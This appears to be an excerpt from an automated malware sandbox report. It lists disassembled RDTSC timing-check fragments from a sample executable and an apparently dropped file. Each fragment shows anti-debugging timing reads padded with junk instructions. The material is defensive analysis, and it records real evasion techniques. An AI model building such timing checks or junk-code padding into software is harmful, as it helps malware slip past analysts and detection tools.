                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56507FF second address: 565081C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EEA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 565081C second address: 56508FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000010 pushad 0x00000011 mov edx, eax 0x00000013 mov ah, 7Dh 0x00000015 popad 0x00000016 mov eax, ebx 0x00000018 jmp 00007F49A8F2A32Bh 0x0000001d mov ecx, dword ptr [ebp-10h] 0x00000020 jmp 00007F49A8F2A336h 0x00000025 mov dword ptr fs:[00000000h], ecx 0x0000002c pushad 0x0000002d mov bh, ah 0x0000002f mov cx, di 0x00000032 popad 0x00000033 pop ecx 0x00000034 pushad 0x00000035 mov dx, D5B6h 0x00000039 popad 0x0000003a pop edi 0x0000003b pushad 0x0000003c pushfd 0x0000003d jmp 00007F49A8F2A336h 0x00000042 sbb al, FFFFFFD8h 0x00000045 jmp 00007F49A8F2A32Bh 0x0000004a popfd 0x0000004b pushfd 0x0000004c jmp 00007F49A8F2A338h 0x00000051 add al, 00000038h 0x00000054 jmp 00007F49A8F2A32Bh 0x00000059 popfd 0x0000005a popad 0x0000005b pop esi 0x0000005c jmp 00007F49A8F2A336h 0x00000061 pop ebx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007F49A8F2A337h 0x00000069 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56508FB second address: 5650913 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F49A854EEA4h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5650913 second address: 56504B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F49A8F2A32Dh 0x00000010 add ecx, 43888C96h 0x00000016 jmp 00007F49A8F2A331h 0x0000001b popfd 0x0000001c call 00007F49A8F2A330h 0x00000021 mov bx, si 0x00000024 pop esi 0x00000025 popad 0x00000026 retn 0008h 0x00000029 cmp dword ptr [ebp-2Ch], 10h 0x0000002d mov eax, dword ptr [ebp-40h] 0x00000030 jnc 00007F49A8F2A325h 0x00000032 push eax 0x00000033 lea edx, dword ptr [ebp-00000590h] 0x00000039 push edx 0x0000003a call esi 0x0000003c push 00000008h 0x0000003e pushad 0x0000003f movzx eax, dx 0x00000042 movsx edi, ax 0x00000045 popad 0x00000046 push 4266A07Bh 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B82940 second address: B82944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B82944 second address: B8294C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B8294C second address: B82982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F49A854EE9Fh 0x00000008 jmp 00007F49A854EEA7h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F49A854EE9Ah 0x00000015 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B82982 second address: B82986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B82986 second address: B8298C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B82DC8 second address: B82DE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A330h 0x00000007 jmp 00007F49A8F2A32Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B82DE8 second address: B82E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007F49A854EE96h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F49A854EEA3h 0x00000014 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B82F79 second address: B82FBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A335h 0x00000007 jmp 00007F49A8F2A336h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F49A8F2A330h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B830DF second address: B830EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EE9Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B830EF second address: B830F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B8581B second address: B8587A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 ja 00007F49A854EE9Ch 0x0000000d je 00007F49A854EE96h 0x00000013 jmp 00007F49A854EE9Eh 0x00000018 popad 0x00000019 nop 0x0000001a mov dword ptr [ebp+122D22EBh], ebx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ebp 0x00000025 call 00007F49A854EE98h 0x0000002a pop ebp 0x0000002b mov dword ptr [esp+04h], ebp 0x0000002f add dword ptr [esp+04h], 0000001Bh 0x00000037 inc ebp 0x00000038 push ebp 0x00000039 ret 0x0000003a pop ebp 0x0000003b ret 0x0000003c add dword ptr [ebp+122D3750h], ecx 0x00000042 push 5EE4EF22h 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B8587A second address: B8587E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B8587E second address: B85884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B859BB second address: B85A00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A32Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c movsx esi, cx 0x0000000f push 00000000h 0x00000011 sub edx, 3EDBB1E6h 0x00000017 call 00007F49A8F2A329h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F49A8F2A337h 0x00000025 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B85A00 second address: B85A0A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F49A854EE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B85B2A second address: B85B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 ja 00007F49A8F2A328h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F49A8F2A336h 0x0000001b rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B85B56 second address: B85B7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EEA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a lea ebx, dword ptr [ebp+1245A711h] 0x00000010 xchg eax, ebx 0x00000011 pushad 0x00000012 push ebx 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B85B7B second address: B85B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B85C34 second address: B85C3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F49A854EE96h 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B85C3E second address: B85C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A32Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B85D1D second address: B85D37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F49A854EEA5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B85D37 second address: B85D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jbe 00007F49A8F2A326h 0x00000010 jmp 00007F49A8F2A32Eh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B85D5A second address: B85D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jne 00007F49A854EE9Ah 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push esi 0x00000017 pop esi 0x00000018 jmp 00007F49A854EEA0h 0x0000001d popad 0x0000001e rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B85D87 second address: B85DFB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F49A8F2A328h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push ebx 0x0000000f pushad 0x00000010 jmp 00007F49A8F2A338h 0x00000015 jmp 00007F49A8F2A339h 0x0000001a popad 0x0000001b pop ebx 0x0000001c pop eax 0x0000001d xor ecx, dword ptr [ebp+122D370Ch] 0x00000023 lea ebx, dword ptr [ebp+1245A71Ch] 0x00000029 mov di, 7366h 0x0000002d xchg eax, ebx 0x0000002e push edi 0x0000002f pushad 0x00000030 pushad 0x00000031 popad 0x00000032 jmp 00007F49A8F2A332h 0x00000037 popad 0x00000038 pop edi 0x00000039 push eax 0x0000003a push ebx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA7577 second address: BA759D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F49A854EEA0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F49A854EEA0h 0x00000010 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B7C833 second address: B7C842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007F49A8F2A326h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B7C842 second address: B7C848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B7C848 second address: B7C896 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A330h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F49A8F2A338h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F49A8F2A339h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B7C896 second address: B7C8AF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F49A854EE96h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007F49A854EE96h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B7C8AF second address: B7C8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A8F2A330h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA567F second address: BA5683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA5683 second address: BA56AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A8F2A32Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F49A8F2A335h 0x00000010 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA56AA second address: BA56B4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F49A854EE9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA5A72 second address: BA5A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA5A78 second address: BA5A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA5A80 second address: BA5A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA5A88 second address: BA5A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA5A8D second address: BA5AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F49A8F2A338h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA5C17 second address: BA5C1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA5C1D second address: BA5C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F49A8F2A32Eh 0x0000000c rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B9C414 second address: B9C41E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F49A854EE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B6F3BF second address: B6F3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F49A8F2A326h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B6F3CD second address: B6F3D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F49A854EE96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B6F3D9 second address: B6F3FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F49A8F2A336h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B6F3FA second address: B6F400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B6F400 second address: B6F417 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A8F2A332h 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B6F417 second address: B6F41D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B6F41D second address: B6F423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B6F423 second address: B6F427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA6637 second address: BA6644 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F49A8F2A326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA6DA1 second address: BA6DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA6DB0 second address: BA6DCD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F49A8F2A337h 0x00000008 jmp 00007F49A8F2A331h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA6DCD second address: BA6DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F49A854EE96h 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA6DD7 second address: BA6DDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA6F00 second address: BA6F04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA707D second address: BA7082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA7082 second address: BA7097 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F49A854EE9Ah 0x00000010 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA7097 second address: BA70A8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007F49A8F2A326h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA70A8 second address: BA70B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA736D second address: BA7375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA7375 second address: BA7379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA7379 second address: BA737F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA737F second address: BA739A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jnl 00007F49A854EE96h 0x0000000d ja 00007F49A854EE96h 0x00000013 pop esi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA739A second address: BA73B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F49A8F2A332h 0x0000000b ja 00007F49A8F2A326h 0x00000011 popad 0x00000012 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BA73B9 second address: BA73C3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F49A854EE9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BACC95 second address: BACCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BACCA1 second address: BACCA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BACCA6 second address: BACCC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F49A8F2A337h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BAD282 second address: BAD286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BAD286 second address: BAD292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BAD292 second address: BAD2D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A854EEA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F49A854EEA4h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jns 00007F49A854EE98h 0x0000001c push eax 0x0000001d push edx 0x0000001e push esi 0x0000001f pop esi 0x00000020 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BAD2D5 second address: BAD2FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F49A8F2A333h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F49A8F2A32Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BAD2FB second address: BAD2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BAD2FF second address: BAD309 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F49A8F2A32Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: B655AE second address: B655B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\DocumentsKJEGCFBGDH.exeRDTSC instruction interceptor: First address: BB2572 second address: BB25AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F49A8F2A337h 0x00000009 popad 0x0000000a jo 00007F49A8F2A340h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F49A8F2A338h 0x00000017 rdtsc
